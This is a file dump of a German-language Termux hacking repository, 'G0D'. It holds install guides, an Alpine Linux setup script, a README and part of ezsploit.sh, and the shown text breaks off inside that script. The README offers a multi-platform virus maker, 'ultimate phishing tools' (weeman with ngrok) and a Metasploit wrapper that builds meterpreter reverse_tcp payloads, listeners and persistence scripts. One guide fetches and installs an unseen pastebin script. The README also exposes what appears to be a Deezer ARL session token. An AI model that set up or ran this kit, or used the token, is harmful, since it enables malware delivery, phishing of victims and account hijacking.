├── 4Kyoutube-dl.md
├── Alpine
    ├── READ.MD
    ├── TermuxAlpine.sh
    ├── bash TermuxAlpinesh.md
    ├── docs
    │   └── images
    │   │   ├── alpinelinux-logo.svg
    │   │   ├── nomedia.me
    │   │   └── ss.png
    └── finaltouchup.sh
├── README.md
├── VirusMaker2019
    ├── README.md
    └── v-maker.zip
├── ezsploit
    ├── README.md
    └── ezsploit.sh
├── metasploit2019
    ├── README.md
    └── metasploit.zip
├── mutterficker.sh
├── ngrok
├── style
    ├── README.md
    ├── bash.bashrc
    ├── bash.zip
    └── optik.sh
├── sudo
    ├── READ.me
    └── sudo
├── sudogottmodus.sh
├── weeman
    ├── .gitignore
    ├── ChangeLog
    ├── LICENSE
    ├── README.md
    ├── contributors.txt
    ├── core
    │   ├── __init__.py
    │   ├── complete.py
    │   ├── config.py
    │   ├── httpd.py
    │   ├── logo.txt
    │   ├── misc.py
    │   ├── shell.py
    │   └── weeman_curr.png
    ├── lib
    │   ├── __init__.py
    │   └── bs4
    │   │   ├── COPYING.txt
    │   │   ├── __init__.py
    │   │   ├── builder
    │   │       ├── 0.txt
    │   │       ├── __init__.py
    │   │       ├── _html5lib.py
    │   │       ├── _htmlparser.py
    │   │       └── _lxml.py
    │   │   ├── dammit.py
    │   │   ├── diagnose.py
    │   │   ├── element.py
    │   │   └── testing.py
    ├── modules
    │   ├── 0.txt
    │   ├── email.py
    │   ├── extract_links.py
    │   ├── is_website_up.py
    │   └── whois_ip.py
    ├── profiles
    │   ├── 0.txt
    │   ├── localhost.profile
    │   └── mobile_localhost.profile
    ├── tools
    │   ├── 0.txt
    │   └── switch_ip_forward.sh
    └── weeman.py
└── yotube Copie all to script.md


/4Kyoutube-dl.md:
--------------------------------------------------------------------------------
 1 | > YouTube Downloader für Termux
 2 | videos bis zu 4k können seit dem letzen update
 3 | gedownloadet werden
 4 | 
 5 | _______
 6 | Type or copy these commands one by one
 7 | _________
 8 | 
 9 | # apt update && apt -y upgrade
10 | 
11 | # termux-setup-storage
12 | 
13 | # pkg install -y python
14 | 
15 | # pkg install -y python2
16 | 
17 | # pip install youtube-dl
18 | 
19 | # mkdir ~/storage/shared/youtube
20 | 
21 | # mkdir -p ~/.config/youtube-dl
22 | 
23 | # pkg install -y ffmpeg
24 | 
25 | # mkdir ~/bin
26 | 
27 | # wget http://pastebin.com/raw/DVVjQMfZ -O ~/bin/termux-url-opener
28 | 
29 | # dos2unix ~/bin/termux-url-opener
30 | 
31 | 
32 | teile youtube videos jetzt mit termux,
33 | und du kannst dir aussuchen in welcher ausflösung du das video bekommst
34 | (nur mp3 und bis zu 4k sind möglich !!)
35 | 


--------------------------------------------------------------------------------
/Alpine/READ.MD:
--------------------------------------------------------------------------------
1 | 
2 | bash TermuxAlpine.sh
3 | 
4 | startalpine
5 | 


--------------------------------------------------------------------------------
/Alpine/TermuxAlpine.sh:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GottModusTermux/G0D/b3661e3b30b7d0deb9e26bef2c1951837be9c13b/Alpine/TermuxAlpine.sh


--------------------------------------------------------------------------------
/Alpine/bash TermuxAlpinesh.md:
--------------------------------------------------------------------------------
 1 | # TermuxAlpine
 2 | 
 3 | #### _powered by_
 4 | 
 5 | ![powered by Alpine](../master/docs/images/alpinelinux-logo.svg)
 6 | 
 7 | ![Optional Text](../master/docs/images/ss.png)
 8 | 
 9 | 
10 | This Termux bash setup shell script will attempt to set Alpine Linux up in your Termux environment.
11 | 
12 | ## _Steps For Installation_
13 | 1. First goto home directory
14 | `cd $HOME`
15 | 2. Get the script
16 | `curl -LO https://raw.githubusercontent.com/Hax4us/TermuxAlpine/master/TermuxAlpine.sh`
17 | 3. Execute the script
18 | `bash TermuxAlpine.sh`
19 | 4. Start Alpine
20 | `startalpine`
21 | 5. For exit just execute
22 | `exit`
23 | 
24 | ## _Steps For First Time Use (Recommended)_
25 | 1. Update Alpine
26 | `apk update`
27 | 2. Now you can install any package by
28 | `apk add package_name`
29 | 
30 | ## Size Comparision
31 | Size  | Alpine  | Arch | Ubuntu
32 | --- | --- | --- | ---
33 | before installation | Around 1 MB 😱  | Around 400 MB | Around 35 MB
34 | after installation | Around 80 MB | Around 2000 MB | Around 1200 MB
35 | 
36 | #### here is full usage details of apk https://wiki.alpinelinux.org/wiki/Alpine_Linux_package_management
37 | 
38 | 
39 | Comments are welcome at https://github.com/Hax4us/TermuxAlpine/issues ✍
40 | 
41 | Pull requests are welcome https://github.com/Hax4us/TermuxAlpine/pulls ✍
42 | 


--------------------------------------------------------------------------------
/Alpine/docs/images/alpinelinux-logo.svg:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="UTF-8" standalone="no"?>
  2 | <!-- Created with Inkscape (http://www.inkscape.org/) -->
  3 | 
  4 | <svg
  5 |    xmlns:dc="http://purl.org/dc/elements/1.1/"
  6 |    xmlns:cc="http://creativecommons.org/ns#"
  7 |    xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
  8 |    xmlns:svg="http://www.w3.org/2000/svg"
  9 |    xmlns="http://www.w3.org/2000/svg"
 10 |    xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd"
 11 |    xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape"
 12 |    id="svg2"
 13 |    version="1.1"
 14 |    inkscape:version="0.48.5 r10040"
 15 |    width="665.16876"
 16 |    height="161.78787"
 17 |    xml:space="preserve"
 18 |    sodipodi:docname="alpinelinux-logo.svg"><metadata
 19 |      id="metadata8"><rdf:RDF><cc:Work
 20 |          rdf:about=""><dc:format>image/svg+xml</dc:format><dc:type
 21 |            rdf:resource="http://purl.org/dc/dcmitype/StillImage" /><dc:title /></cc:Work></rdf:RDF></metadata><defs
 22 |      id="defs6"><clipPath
 23 |        clipPathUnits="userSpaceOnUse"
 24 |        id="clipPath16"><path
 25 |          d="M 0,560 960,560 960,0 0,0 0,560 z"
 26 |          id="path18"
 27 |          inkscape:connector-curvature="0" /></clipPath></defs><sodipodi:namedview
 28 |      pagecolor="#ffffff"
 29 |      bordercolor="#666666"
 30 |      borderopacity="1"
 31 |      objecttolerance="10"
 32 |      gridtolerance="10"
 33 |      guidetolerance="10"
 34 |      inkscape:pageopacity="0"
 35 |      inkscape:pageshadow="2"
 36 |      inkscape:window-width="1595"
 37 |      inkscape:window-height="964"
 38 |      id="namedview4"
 39 |      showgrid="false"
 40 |      fit-margin-top="0"
 41 |      fit-margin-left="0"
 42 |      fit-margin-right="0"
 43 |      fit-margin-bottom="0"
 44 |      inkscape:zoom="0.33333333"
 45 |      inkscape:cx="-197.05676"
 46 |      inkscape:cy="-80.4375"
 47 |      inkscape:window-x="276"
 48 |      inkscape:window-y="233"
 49 |      inkscape:window-maximized="0"
 50 |      inkscape:current-layer="g10" /><g
 51 |      id="g10"
 52 |      inkscape:groupmode="layer"
 53 |      inkscape:label="Alpine_Linux_logo_v4"
 54 |      transform="matrix(1.25,0,0,-1.25,-267.55675,592.22537)"><g
 55 |        id="g20"
 56 |        transform="translate(686.7844,397.9583)"
 57 |        style="fill:#0d597f;fill-opacity:1"><path
 58 |          d="m 0,0 c -3.74,6.413 -3.73,19.372 0.023,26.161 1.64,2.969 6.622,9.559 28.367,9.559 4.468,0 7.739,-0.229 10.148,-0.554 5.278,-0.71 9.297,-2.509 9.297,-7.425 0,-6.49 -9.565,-6.55 -9.565,-6.55 l -20.27,0 C 9.392,21.191 8.734,9.287 8.734,9.287 l 9.17,0 20.366,0 c 10.375,0 21.125,4.649 21.125,18.258 0,9.047 -5.207,15.135 -13.71,17.468 -8.498,2.332 -11.809,2.206 -23.391,1.998 C 13.02,46.845 7.679,44.81 4.305,43.752 -1.609,41.896 -6.907,38.432 -10.48,31.966 -16.297,21.438 -16.244,4.03 -10.365,-6.047 -4.08,-16.821 6.696,-22.587 19.723,-22.597 l 39.672,0 10e-4,11.943 -39.714,0 C 8.246,-10.688 2.571,-4.408 0,0"
 59 |          style="fill:#0d597f;fill-opacity:1;fill-rule:nonzero;stroke:none"
 60 |          id="path22"
 61 |          inkscape:connector-curvature="0" /></g><g
 62 |        id="g24"
 63 |        transform="translate(441.9298,442.9648)"
 64 |        style="fill:#0d597f;fill-opacity:1"><path
 65 |          d="m 0,0 c -10.527,5.817 -27.936,5.764 -38.013,-0.115 -14.384,-8.391 -19.841,-24.786 -14.594,-43.858 2.693,-9.79 9.965,-17.002 21.03,-20.855 7.818,-2.723 15.012,-2.801 15.31,-2.803 l -0.015,12 c -0.207,10e-4 -20.756,0.305 -24.755,14.842 -5.16,18.758 3.468,27.041 9.071,30.309 6.413,3.74 19.372,3.73 26.161,-0.023 7.212,-3.985 7.733,-12.297 7.733,-25.513 l 0,-24.358 c 0,-8.608 12,-9.171 12,-9.171 l 0,9.171 0,24.358 c 0,12.618 0,28.319 -13.928,36.016"
 66 |          style="fill:#0d597f;fill-opacity:1;fill-rule:nonzero;stroke:none"
 67 |          id="path26"
 68 |          inkscape:connector-curvature="0" /></g><g
 69 |        id="g28"
 70 |        transform="translate(597.6101,375.3665)"
 71 |        style="fill:#0d597f;fill-opacity:1"><path
 72 |          d="m 0,0 0,37.405 c 0.011,13.027 5.776,23.803 16.55,30.088 10.078,5.878 27.486,5.932 38.013,0.115 13.928,-7.697 13.928,-23.399 13.928,-36.016 l 0,-24.319 0,-9.171 c 0,0 -12,0.563 -12,9.171 l 0,24.319 c 0,13.216 -0.521,21.528 -7.733,25.513 C 41.969,60.858 29.01,60.868 22.597,57.128 18.189,54.557 11.909,48.882 11.943,37.446 l 0,-37.447 L 0,0 z"
 73 |          style="fill:#0d597f;fill-opacity:1;fill-rule:nonzero;stroke:none"
 74 |          id="path30"
 75 |          inkscape:connector-curvature="0" /></g><g
 76 |        id="g32"
 77 |        transform="translate(579.8309,375.3661)"
 78 |        style="fill:#0d597f;fill-opacity:1"><path
 79 |          d="m 0,0 0,47.562 0,9.171 c 0,0 11.904,-0.658 11.904,-9.267 L 11.904,0 0,0 z"
 80 |          style="fill:#0d597f;fill-opacity:1;fill-rule:nonzero;stroke:none"
 81 |          id="path34"
 82 |          inkscape:connector-curvature="0" /></g><g
 83 |        id="g36"
 84 |        transform="translate(591.7351,443.8518)"
 85 |        style="fill:#0d597f;fill-opacity:1"><path
 86 |          d="m 0,0 0,-2.028 0,-9.171 c 0,0 -11.904,0.658 -11.904,9.267 L -11.904,0 0,0 z"
 87 |          style="fill:#0d597f;fill-opacity:1;fill-rule:nonzero;stroke:none"
 88 |          id="path38"
 89 |          inkscape:connector-curvature="0" /></g><g
 90 |        id="g40"
 91 |        transform="translate(519.3928,442.6805)"
 92 |        style="fill:#0d597f;fill-opacity:1"><path
 93 |          d="m 0,0 c 10.527,5.817 27.936,5.764 38.013,-0.115 14.384,-8.391 19.841,-24.786 14.594,-43.858 -2.693,-9.79 -9.965,-17.002 -21.03,-20.855 -7.818,-2.723 -15.007,-2.447 -15.305,-2.449 l 0.01,11.899 c 0.207,10e-4 20.756,0.052 24.755,14.589 5.16,18.758 -3.468,27.041 -9.071,30.309 -6.413,3.74 -19.372,3.73 -26.161,-0.023 -7.212,-3.985 -7.733,-12.297 -7.733,-25.513 l 0,-12.612 c 0,-8.608 -12,-9.17 -12,-9.17 l 0,9.17 0,12.612 c 0,12.618 0,28.319 13.928,36.016"
 94 |          style="fill:#0d597f;fill-opacity:1;fill-rule:nonzero;stroke:none"
 95 |          id="path42"
 96 |          inkscape:connector-curvature="0" /></g><g
 97 |        id="g44"
 98 |        transform="translate(517.3693,344.6278)"
 99 |        style="fill:#0d597f;fill-opacity:1"><path
100 |          d="m 0,0 0,30.505 0,9.17 c 0,0 -11.904,-0.658 -11.904,-9.266 L -11.904,0 0,0 z"
101 |          style="fill:#0d597f;fill-opacity:1;fill-rule:nonzero;stroke:none"
102 |          id="path46"
103 |          inkscape:connector-curvature="0" /></g><g
104 |        id="g48"
105 |        transform="translate(473.349,473.7803)"
106 |        style="fill:#0d597f;fill-opacity:1"><path
107 |          d="m 0,0 0,-32.359 0,-9.17 c 0,0 -11.904,0.658 -11.904,9.266 L -11.904,0 0,0 z"
108 |          style="fill:#0d597f;fill-opacity:1;fill-rule:nonzero;stroke:none"
109 |          id="path50"
110 |          inkscape:connector-curvature="0" /></g><g
111 |        id="g52"
112 |        transform="translate(474.9603,402.1447)"
113 |        style="fill:#0d597f;fill-opacity:1"><path
114 |          d="m 0,0 c -1.039,3.777 -1.519,7.129 -1.577,10.101 l -0.034,10.255 c 0,8.608 -11.913,9.171 -11.913,9.171 l 0,-9.171 0,-10.193 c 0.037,-4.24 0.68,-8.714 1.954,-13.347 2.693,-9.79 9.966,-17.002 21.03,-20.855 7.818,-2.723 14.992,-2.743 15.289,-2.745 l 0.006,11.942 C 24.548,-14.841 3.999,-14.537 0,0"
115 |          style="fill:#0d597f;fill-opacity:1;fill-rule:nonzero;stroke:none"
116 |          id="path54"
117 |          inkscape:connector-curvature="0" /></g><g
118 |        id="g56"
119 |        transform="translate(268.1394,393.2718)"
120 |        style="fill:#0d597f;fill-opacity:1"><path
121 |          d="M 0,0 0,15.687 -11.296,4.379 C -10.079,3.532 -8.932,2.836 -7.853,2.27 -6.774,1.703 -5.764,1.265 -4.823,0.932 -3.882,0.598 -3.009,0.37 -2.206,0.222 -1.402,0.075 -0.667,0.009 0,0 m 57.751,1.304 c 0.02,-0.017 0.13,-0.11 0.333,-0.239 0.204,-0.13 0.502,-0.297 0.898,-0.462 0.395,-0.164 0.889,-0.327 1.485,-0.448 0.596,-0.122 1.294,-0.202 2.098,-0.202 0.671,0 1.411,0.059 2.222,0.2 0.812,0.142 1.693,0.367 2.645,0.699 0.953,0.333 1.976,0.773 3.07,1.344 1.094,0.572 2.259,1.276 3.495,2.136 L 65.425,12.729 37.015,41.245 24.549,28.776 7.733,46.117 -34.471,4.39 c 1.235,-0.86 2.398,-1.564 3.491,-2.136 1.093,-0.571 2.115,-1.011 3.067,-1.344 0.951,-0.332 1.832,-0.557 2.643,-0.698 0.81,-0.142 1.55,-0.201 2.22,-0.201 0.804,0 1.502,0.08 2.097,0.202 0.596,0.121 1.089,0.284 1.485,0.449 0.396,0.164 0.693,0.331 0.897,0.461 0.204,0.13 0.314,0.223 0.334,0.24 L 0.815,20.415 7.628,26.948 26.494,8.082 33.085,1.304 c 0.02,-0.017 0.13,-0.11 0.334,-0.239 0.204,-0.13 0.501,-0.297 0.897,-0.462 0.396,-0.164 0.89,-0.327 1.485,-0.448 0.596,-0.122 1.295,-0.202 2.099,-0.202 0.67,0 1.411,0.059 2.222,0.2 0.811,0.142 1.693,0.367 2.645,0.699 0.952,0.333 1.975,0.773 3.069,1.344 1.094,0.572 2.259,1.276 3.495,2.136 L 34.192,19.157 37.01,21.975 50.111,8.874 57.751,1.304 M 57.588,80.32 94.807,15.838 57.588,-48.644 l -74.463,0 -37.219,64.482 37.219,64.482 74.463,0 z"
122 |          style="fill:#0d597f;fill-opacity:1;fill-rule:nonzero;stroke:none"
123 |          id="path58"
124 |          inkscape:connector-curvature="0" /></g><g
125 |        id="g60"
126 |        transform="translate(302.5041,412.251)"
127 |        style="fill:#0d597f;fill-opacity:1"><path
128 |          d="M 0,0 -9.913,9.895 -9.208,10.604 0.775,0.73 0,0 z"
129 |          style="fill:#0d597f;fill-opacity:1;fill-rule:nonzero;stroke:none"
130 |          id="path62"
131 |          inkscape:connector-curvature="0" /></g><g
132 |        id="g64"
133 |        transform="translate(528.4338,353.235)"
134 |        style="fill:#0d597f;fill-opacity:1"><path
135 |          d="m 0,0 0,22.161 -2,0 L -2,0 c 0,-4.295 3.35,-8.885 12.75,-8.885 l 15.25,0 0,2 -15.25,0 C 0.775,-6.885 0,-1.615 0,0"
136 |          style="fill:#0d597f;fill-opacity:1;fill-rule:nonzero;stroke:none"
137 |          id="path66"
138 |          inkscape:connector-curvature="0" /></g><path
139 |        d="m 561.073,344.35 2,0 0,22.787 -2,0 0,-22.787 z"
140 |        style="fill:#0d597f;fill-opacity:1;fill-rule:nonzero;stroke:none"
141 |        id="path68"
142 |        inkscape:connector-curvature="0" /><path
143 |        d="m 561.073,368.358 2,0 0,2.992 -2,0 0,-2.992 z"
144 |        style="fill:#0d597f;fill-opacity:1;fill-rule:nonzero;stroke:none"
145 |        id="path70"
146 |        inkscape:connector-curvature="0" /><g
147 |        id="g72"
148 |        transform="translate(664.6232,367.1373)"
149 |        style="fill:#0d597f;fill-opacity:1"><path
150 |          d="m 0,0 -2.634,0 -8.469,-9.888 -8.481,9.888 -2.634,0 9.796,-11.428 -9.729,-11.359 2.62,0 8.422,9.827 8.423,-9.827 2.647,0 -9.75,11.367 L 0,0 z"
151 |          style="fill:#0d597f;fill-opacity:1;fill-rule:nonzero;stroke:none"
152 |          id="path74"
153 |          inkscape:connector-curvature="0" /></g><g
154 |        id="g76"
155 |        transform="translate(634.3527,353.11)"
156 |        style="fill:#0d597f;fill-opacity:1"><path
157 |          d="M 0,0 C 0,-0.691 -0.366,-6.76 -13.063,-6.76 -25.637,-6.76 -26,-0.691 -26,0 l 0,14.027 -2,0 L -28,0 c 0,-0.896 0.419,-8.76 14.937,-8.76 C 1.577,-8.76 2,-0.896 2,0 l 0,14.027 -2,0 L 0,0 z"
158 |          style="fill:#0d597f;fill-opacity:1;fill-rule:nonzero;stroke:none"
159 |          id="path78"
160 |          inkscape:connector-curvature="0" /></g><g
161 |        id="g80"
162 |        transform="translate(584.7756,367.1373)"
163 |        style="fill:#0d597f;fill-opacity:1"><path
164 |          d="m 0,0 c -14.64,0 -15.063,-7.863 -15.063,-8.76 l 0,-14.027 2,0 0,14.027 c 0,0.692 0.367,6.76 13.063,6.76 12.574,0 12.938,-6.068 12.938,-6.76 l 0,-14.027 2,0 0,14.027 C 14.938,-7.863 14.519,0 0,0"
165 |          style="fill:#0d597f;fill-opacity:1;fill-rule:nonzero;stroke:none"
166 |          id="path82"
167 |          inkscape:connector-curvature="0" /></g></g></svg>


--------------------------------------------------------------------------------
/Alpine/docs/images/nomedia.me:
--------------------------------------------------------------------------------
1 | nomedia
2 | 


--------------------------------------------------------------------------------
/Alpine/docs/images/ss.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GottModusTermux/G0D/b3661e3b30b7d0deb9e26bef2c1951837be9c13b/Alpine/docs/images/ss.png


--------------------------------------------------------------------------------
/Alpine/finaltouchup.sh:
--------------------------------------------------------------------------------
 1 | #!/data/data/com.termux/files/usr/bin/bash
 2 | addprofile()
 3 | {
 4 | 	cat > $HOME/TermuxAlpine/etc/profile <<- EOM
 5 | 	export CHARSET=UTF-8
 6 | 	export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
 7 | 	export PAGER=less
 8 | 	export PS1='[termux@alpine \W]\\$ '
 9 | 	umask 022
10 | 	for script in /etc/profile.d/*.sh ; do
11 | 	if [ -r \$script ] ; then
12 | 	. \$script
13 | 	fi
14 | 	done
15 | 	EOM
16 | }
17 | 
18 | addmotd() {
19 | 	cat > $HOME/TermuxAlpine/etc/profile.d/motd.sh  <<- EOM
20 | 	printf "\n\033[1;34mWelcome to Alpine Linux in Termux!  Enjoy!\033[0m\033[1;34m
21 | 	Chat:    \033[0m\033[mhttps://gitter.im/termux/termux/\033[0m\033[1;34m
22 | 		Help:    \033[0m\033[34minfo <query> \033[0m\033[mand \033[0m\033[34mman <query> \033[0m\033[1;34m
23 | 			Portal:  \033[0m\033[mhttps://wiki.termux.com/wiki/Community\033[0m\033[1;34m
24 | 
25 | 		Install a package: \033[0m\033[34mapk add <package>\033[0m\033[1;34m
26 | 			More  information: \033[0m\033[34mapk --help\033[0m\033[1;34m
27 | 				Search   packages: \033[0m\033[34mapk search <query>\033[0m\033[1;34m
28 | 					Upgrade  packages: \033[0m\033[34mapk upgrade \n\033[0m \n"
29 | 						EOM
30 | }
31 | 
32 | updrepos() {
33 | 	cp $HOME/TermuxAlpine/etc/apk/repositories $HOME/TermuxAlpine/etc/apk/repositories.bak
34 | 	cat > $HOME/TermuxAlpine/etc/apk/repositories <<- EOM
35 | 	http://dl-cdn.alpinelinux.org/alpine/latest-stable/main/
36 | 	http://dl-cdn.alpinelinux.org/alpine/latest-stable/community/
37 | 	http://dl-cdn.alpinelinux.org/alpine/edge/testing/
38 | 	EOM
39 | }
40 | # thnx to @j16180339887 for DNS picker 
41 | #addresolvconf ()
42 | #{
43 | #	[ $(command -v getprop) ] && getprop | sed -n -e 's/^\[net\.dns.\]: \[\(.*\)\]/\1/p' | sed '/^\s*$/d' | sed 's/^/nameserver /' > $HOME/TermuxAlpine/etc/resolv.conf
44 | #}
45 | 
46 | addprofile
47 | addmotd
48 | #addresolvconf
49 | updrepos
50 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # G0D on Termux
  2 | all for full Termux
  3 | Ultimate Linux Terminal on Android
  4 | 
  5 | # https://youtu.be/YK9D5IPNU_o
  6 | Update Januar 2020 !!
  7 | install (fast) sudo on Termux for a "full Linux Terminal"
  8 | 
  9 |  Alpine         = miniOS for Termux . 
 10 |  
 11 |  VirusMaker2019 = "Malicious" best virus downloader(for MacOS,LinuxAndroid,Windows) .  
 12 |  
 13 |   ezsploit       = one easy way to create payload . 
 14 |   
 15 |   metasploit2019 = metasploit installer TuT for Dummies .  
 16 |   
 17 |   style          = make your Termux to YOUR Termux .  
 18 |   
 19 | ! sudo           = "superuser do" install first ! root is in "sudo", but no "sudo"is in "root"
 20 | 
 21 | 
 22 |   weeman +ngrok  = ultimate phishing tools . 
 23 |  __________ 
 24 | 
 25 | # SUPERUSER DO !! aka. SUDO** first install sudo before we run more programs & tools
 26 | 
 27 | SUDO not full work on Magisk !! Root your smartphone with SuperSU
 28 | 
 29 | follow the next steps for SUDO**
 30 | 
 31 | ----------
 32 | 
 33 | # $download& install via GitHub (without ZIP)
 34 | 
 35 | # Copy&Paste the next commandos:
 36 | 
 37 | > termux-setup-storage
 38 | 
 39 | > apt update -y && apt upgrade -y
 40 | 
 41 | > apt install git -y
 42 | 
 43 | > pkg install ncurses-utils
 44 | 
 45 | > git clone https://github.com/GottModusTermux/G0D.git && cd G0D/sudo
 46 | 
 47 | > apt install fish -y && fish
 48 | 
 49 | > cat sudo > /data/data/com.termux/files/usr/bin/sudo
 50 | 
 51 | > chmod 700 /data/data/com.termux/files/usr/bin/sudo
 52 | 
 53 | > exit
 54 | 
 55 | > sudo
 56 | ____
 57 | 
 58 | # $import "G0D-master.zip" in your Termux
 59 | 
 60 | For example, if the ZIP is in your /0/Download/ folder,
 61 | 
 62 | # Copy&Paste the next commands:
 63 | 
 64 | > termux-setup-storage
 65 | 
 66 | > cd storage/downloads/
 67 | 
 68 | > cp -f G0D-master.zip $HOME
 69 | 
 70 | > cd
 71 | 
 72 | > pkg install zip -y
 73 | 
 74 | > unzip G0D-master.zip 
 75 | 
 76 | > cd G0D-master/sudo
 77 | 
 78 | > apt update -y && apt upgrade -y
 79 | 
 80 | > pkg install ncurses-utils
 81 | 
 82 | > apt install fish -y && fish
 83 | 
 84 | > cat sudo > /data/data/com.termux/files/usr/bin/sudo
 85 | 
 86 | > chmod 700 /data/data/com.termux/files/usr/bin/sudo
 87 | 
 88 | > exit
 89 | 
 90 | > sudo
 91 | 
 92 | # #GottModusTermux
 93 | 
 94 | SUDO** (superuser do) is a utility for UNIX- and Linux-based systems
 95 | 
 96 | that provides an efficient way to give specific users permission to use specific system ...
 97 | 
 98 | GottModusTermux <---
 99 | 
100 | 
101 | arl for freezer:
102 | 9d9946763d3f5160bc70ef45013475470f2d33b4dbf52cdd4b0b15c2c2226f357e684b354bbe174292b37b03e127fb434ffffad7e3b8bccfe89e3b4c747de42b93985b137461ce6cccf2a13d52b98ded5fe2de6b19fb50f4f220d682a7b07a74
103 | 


--------------------------------------------------------------------------------
/VirusMaker2019/README.md:
--------------------------------------------------------------------------------
 1 | # Virus-Maker "Malicious"
 2 | (for Linux,Windows,MacOS,Android)
 3 | 
 4 |  termux-setup-storage
 5 |  
 6 |  pkg install python2
 7 |  
 8 |  git clone https://github.com/GottModusTermux/G0D.git
 9 | 
10 |  cd /G0D/VirusMaker2019/
11 | 
12 |  unzip v-maker.zip
13 | 
14 |  cd v-maker
15 | 
16 |  pip2 install -r requirements.txt
17 | 
18 |  python2 malicious.py
19 | 
20 | > after download virus open your file explorer
21 | > find folder Malicious and open it
22 | > chose and open folder Android if you download virus Android
23 | __________
24 | # https://t.me/joinchat/KCZWlxJt2j87ZuuXLocKSA
25 | Termux Telegram Gruppe GER-Unterstützung 
26 | 
27 | https://www.youtube.com/channel/UCH2Qr1wpHMNBChgyusqjpLg?view_as=subscriber
28 | 


--------------------------------------------------------------------------------
/VirusMaker2019/v-maker.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GottModusTermux/G0D/b3661e3b30b7d0deb9e26bef2c1951837be9c13b/VirusMaker2019/v-maker.zip


--------------------------------------------------------------------------------
/ezsploit/README.md:
--------------------------------------------------------------------------------
 1 | # First install TSU &Metasploit
 2 | [https://youtu.be/B_49pqaXpAs ..Metasploit error free
 3 | https://github.com/GottModusTermux/G0D/tree/master/metasploit2019]
 4 | 
 5 | Command line script for automating metasploit functions
 6 | 
 7 | folgende befehle:
 8 | 
 9 |     pkg install tsu -y
10 |     cd G0D/ezsploit/
11 |     chmod +x *
12 |     tsu
13 |     bash ezsploit.sh
14 | 
15 | __________
16 | - Checks for metasploit service and starts if not present
17 | - Easily craft meterpreter reverse_tcp payloads for Windows, Linux, Android $
18 | - Start multiple meterpreter reverse_tcp listners
19 | - Assistance with building basic persistence options and scripts
20 | - Armitage launcher
21 | - Drop into Msfconsole
22 | - Some other fun stuff :)
23 | 
24 | ------------------------------------------
25 | 
26 | To-Do
27 | 
28 | Add more functions to payloads/listners, java, php, tomcat etc
29 | 
30 | Improve overall functionality
31 | 
32 | # https://t.me/joinchat/KCZWlxJt2j87ZuuXLocKSA
33 | >Termux Telegram Gruppe GER-Unterstützung 
34 | 


--------------------------------------------------------------------------------
/ezsploit/ezsploit.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/bash
  2 | # etc etc etc
  3 | # ..................
  4 | [[ `id -u` -eq 0 ]] || { echo -e "\e[31mMust be root to run script"; exit 1; }
  5 | resize -s 30 60
  6 | clear                                   # Clear the screen.
  7 | SERVICE=service;
  8 | 
  9 | if ps ax | grep -v grep | grep metasploit > /dev/null
 10 | then
 11 |     echo "$SERVICE service running"
 12 | else
 13 |     echo "$SERVICE is not running, Starting service." 
 14 |     sudo service metasploit start
 15 | fi 
 16 | mkdir ~/Desktop/temp 
 17 | clear
 18 | clear
 19 | echo -e "\E[1;33m:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
 20 | echo -e "\E[1;33m:::::::::::::: \e[97mMetasploit service started \E[1;33m:::::::::::::::::"
 21 | echo -e "\E[1;33m:::::: \e[97mScripts and payloads saved to ~/Desktop/temp/ \E[1;33m::::::"
 22 | echo -e "\E[1;33m:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
 23 | read -p "Press [Enter] key to Continue..."
 24 | clear
 25 | echo -e "\E[1;33m:::::::::::::: \e[97mMetasploit automation script \E[1;33m:::::::::::::::"
 26 | echo -e "\e[97m                      ______
 27 |                    .-        -.
 28 |                   /            \               by rand0m1ze
 29 |      \e[94m* \e[97m                   \e[90m* \e[97m
 30 |                  |,  .-.  .-.  ,|        \e[32m* \e[97m
 31 |                  | )(_ /  \_ )( |
 32 |                  |/     /\     \|    \e[34m* \e[97m
 33 |        (@_       <__    ^^    __>         \e[95m* \e[97m
 34 |   _     ) \_______\__|IIIIII|__/____________\e[31m___________ \e[97m
 35 |  (_)\e[31m@8@8\e[97m{}<________\e[31m_____\e[97m_____________\e[31m___________________> \e[97m
 36 |         )_/         \ IIIIII /                    \e[31m::::: \e[97m
 37 |        (@            --------                        \e[31m:: \e[97m
 38 |         "
 39 | tput sgr0                                       # 
 40 | echo -e "\e[31m_________________________[ \e[97mSELECT AN OPTION TO BEGIN \e[31m]"
 41 | echo -e "\E[1;33m::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
 42 | echo -e "\E[1;33m:::\e[97m[1] \e[90mPayload       \e[97m [Create a payload with msvenom]  \E[1;33m"
 43 | tput sgr0                               # Reset colors to "normal."
 44 | echo -e "\E[1;33m:::\e[97m[2] \e[32mListen    \e[97m [Start a multi handler]   \E[1;33m"
 45 | tput sgr0
 46 | echo -e "\E[1;33m:::\e[97m[3] \e[34mExploit       \e[97m [Drop into msfconsole]\E[1;33m"
 47 | tput sgr0
 48 | echo -e "\E[1;33m:::\e[97m[4] \e[95mPersistence        \e[97m [Forge a Persistence script] \E[1;33m"
 49 | tput sgr0
 50 | echo -e "\E[1;33m:::\e[97m[5] \e[31mArmitage       \e[97m [Launch Armitage GUI]  \E[1;33m"
 51 | tput sgr0
 52 | echo -e "\E[1;33m:::\e[97m[X] \e[32mHack The Gibson    \e[97m [Hac/< The P1aneT]   \E[1;33m"
 53 | tput sgr0                               # Reset attributes.
 54 | echo -e "\E[1;33m::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
 55 | echo -e "\e[97m~~~~~~~~~~~~~~~~~~~~ \e[31mGreetz to the 2600 \e[97m~~~~~~~~~~~~~~~~~~~~\e[31m"
 56 | tput sgr0
 57 | 
 58 | 
 59 | read options
 60 | 
 61 | case "$options" in
 62 | # Note variable is quoted.
 63 | 
 64 |   "1" | "1" )
 65 |   # Accept upper or lowercase input.
 66 |   echo -e "\E[1;33m::::: \e[97mLets Craft a PAYLOAD\E[1;33m:::::"
 67 | 
 68 | PS3='Enter your choice 6=QUIT: '
